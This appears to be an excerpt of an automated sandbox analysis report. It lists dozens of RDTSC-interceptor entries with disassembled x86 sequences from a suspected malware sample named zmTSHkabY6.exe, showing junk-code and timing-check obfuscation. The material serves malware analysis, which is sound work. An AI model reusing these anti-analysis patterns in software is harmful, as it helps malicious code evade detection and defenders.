Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7D5D second address: 9B7D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7D67 second address: 9B7D71 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9899183FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7FE9 second address: 9B8003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007F98991A2756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F98991A2756h 0x00000014 jnl 00007F98991A2756h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B8003 second address: 9B8007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B81C0 second address: 9B81E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F98991A2762h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B81E0 second address: 9B81E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B81E6 second address: 9B81EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B84D3 second address: 9B84D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B84D7 second address: 9B84E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B8643 second address: 9B8663 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9899183FFBh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B8663 second address: 9B867F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F98991A275Fh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B894B second address: 9B8972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9899183FE6h 0x0000000a jmp 00007F9899183FF0h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 jo 00007F9899183FEEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9ACBD0 second address: 9ACBD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9ACBD7 second address: 9ACBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B949B second address: 9B949F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9735 second address: 9B973B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B973B second address: 9B9741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9741 second address: 9B974D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BAEDE second address: 9BAEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BAEE4 second address: 9BAEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE30D second address: 9BE33B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F98991A2758h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F98991A2756h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE33B second address: 9BE354 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F9899183FE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE354 second address: 9BE35E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE35E second address: 9BE36C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BCA5B second address: 9BCA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BCA5F second address: 9BCA69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE453 second address: 9BE45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F98991A2756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE45D second address: 9BE461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE461 second address: 9BE490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F98991A2768h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jng 00007F98991A2756h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE490 second address: 9BE4AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9899183FF5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C012A second address: 9C0136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F98991A2756h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C5DD8 second address: 9C5DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C5DDC second address: 9C5DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F98991A2766h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C60C9 second address: 9C60DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C60DF second address: 9C60E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98991A275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C849C second address: 9C84A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C84A0 second address: 9C84A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C84A6 second address: 9C853C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9899183FECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 113B6894h 0x00000011 mov esi, dword ptr [ebp+122D31EAh] 0x00000017 call 00007F9899183FE9h 0x0000001c jo 00007F9899183FEEh 0x00000022 push ecx 0x00000023 jng 00007F9899183FE6h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b jc 00007F9899183FFFh 0x00000031 jmp 00007F9899183FF9h 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push eax 0x0000003b jmp 00007F9899183FF3h 0x00000040 pop eax 0x00000041 mov eax, dword ptr [eax] 0x00000043 jmp 00007F9899183FF9h 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jo 00007F9899183FE6h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C853C second address: 9C8542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C88A6 second address: 9C88AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9006 second address: 9C9052 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F98991A2756h 0x00000011 jmp 00007F98991A2762h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d mov esi, dword ptr [ebp+122D3846h] 0x00000023 nop 0x00000024 jnp 00007F98991A2764h 0x0000002a push eax 0x0000002b push eax 0x0000002c pushad 0x0000002d push edx 0x0000002e pop edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9494 second address: 9C94BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F9899183FFDh 0x0000000f jmp 00007F9899183FF7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C962F second address: 9C9643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 cld 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F98991A2756h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9643 second address: 9C9657 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jno 00007F9899183FE6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9657 second address: 9C965D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9A97 second address: 9C9AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jbe 00007F9899183FF4h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CA407 second address: 9CA40C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CB3BA second address: 9CB3CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007F9899184000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CB3CC second address: 9CB438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F98991A2758h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 or esi, dword ptr [ebp+122D38FEh] 0x0000002a push 00000000h 0x0000002c mov si, cx 0x0000002f mov si, di 0x00000032 push 00000000h 0x00000034 mov si, bx 0x00000037 xchg eax, ebx 0x00000038 jmp 00007F98991A2763h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jns 00007F98991A2756h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CB438 second address: 9CB43E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC7DE second address: 9CC7E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98991A275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC7E8 second address: 9CC841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 movzx edi, di 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d mov si, DAB1h 0x00000011 pop esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F9899183FE8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D1B96h] 0x00000034 xchg eax, ebx 0x00000035 jnl 00007F9899183FF9h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC841 second address: 9CC845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC845 second address: 9CC84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CD24C second address: 9CD250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CD250 second address: 9CD254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CD254 second address: 9CD2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F98991A2758h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D1B40h] 0x00000027 and esi, 3E7DBF06h 0x0000002d push 00000000h 0x0000002f mov esi, edx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D2AC1h], esi 0x00000039 jc 00007F98991A275Bh 0x0000003f xor si, 427Fh 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 ja 00007F98991A2758h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE894 second address: 9CE89A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE648 second address: 9CE64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE89A second address: 9CE8E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+12450724h], edi 0x00000013 push 00000000h 0x00000015 mov esi, 0A736B3Ch 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F9899183FE8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 js 00007F9899183FE6h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 push eax 0x00000041 pop eax 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE64E second address: 9CE658 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98991A275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE658 second address: 9CE669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F9899183FE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CF0EE second address: 9CF0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE669 second address: 9CE66D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 981A38 second address: 981A6B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F98991A2760h 0x0000000f pushad 0x00000010 jmp 00007F98991A2760h 0x00000015 jnc 00007F98991A2756h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE66D second address: 9CE673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 981A6B second address: 981A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98991A2756h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D5D8B second address: 9D5DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9899183FF9h 0x00000009 jmp 00007F9899183FF0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D5DB8 second address: 9D5DC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D5DC2 second address: 9D5DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D3DB5 second address: 9D3DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D64B8 second address: 9D6566 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9899183FEFh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jno 00007F9899183FEBh 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F9899183FE8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D3360h], ebx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 or ebx, 5B315DA7h 0x0000004c mov di, 2AD8h 0x00000050 mov eax, dword ptr [ebp+122D0825h] 0x00000056 sub dword ptr [ebp+122D3326h], eax 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push esi 0x00000061 call 00007F9899183FE8h 0x00000066 pop esi 0x00000067 mov dword ptr [esp+04h], esi 0x0000006b add dword ptr [esp+04h], 0000001Bh 0x00000073 inc esi 0x00000074 push esi 0x00000075 ret 0x00000076 pop esi 0x00000077 ret 0x00000078 push ecx 0x00000079 pop ebx 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d push edx 0x0000007e jmp 00007F9899183FECh 0x00000083 pop edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D7536 second address: 9D753A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D927E second address: 9D9282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1D015 second address: A1D030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2767h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1D1E4 second address: A1D1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2322B second address: A23235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21C7B second address: A21C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21DDE second address: A21DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21DE4 second address: A21E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9899183FE6h 0x0000000a popad 0x0000000b jmp 00007F9899183FF7h 0x00000010 pop ebx 0x00000011 ja 00007F9899184011h 0x00000017 jbe 00007F9899183FF9h 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21FDB second address: A21FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
